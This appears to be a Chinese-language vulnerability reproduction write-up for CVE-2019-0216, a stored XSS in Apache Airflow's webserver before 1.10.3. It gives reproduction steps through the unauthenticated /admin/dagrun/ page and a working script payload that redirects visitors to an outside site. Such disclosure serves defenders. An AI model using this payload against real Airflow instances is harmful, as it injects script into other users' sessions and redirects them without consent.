跳转至

(CVE-2019-0216)Apache Airflow 储存型xss

一、漏洞简介

Apache Airflow 1.10.2及之前版本中的airflow webserver服务存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。

二、漏洞影响

Apache Airflow \< 1.10.3

三、复现过程

访问/admin/dagrun/(默认是不需要密码)

创建一个项目

1.png

返回列表,可以看到点击"运行"可以让你输入HTML代码

2.png

可以在里面输入代码

&lt;script&gt;_a="https://www.0-sec.org"&lt;/script&gt;
&lt;script&gt;document.location=_a&lt;/script&gt;

3.png

可直接造成储存型xss

4.png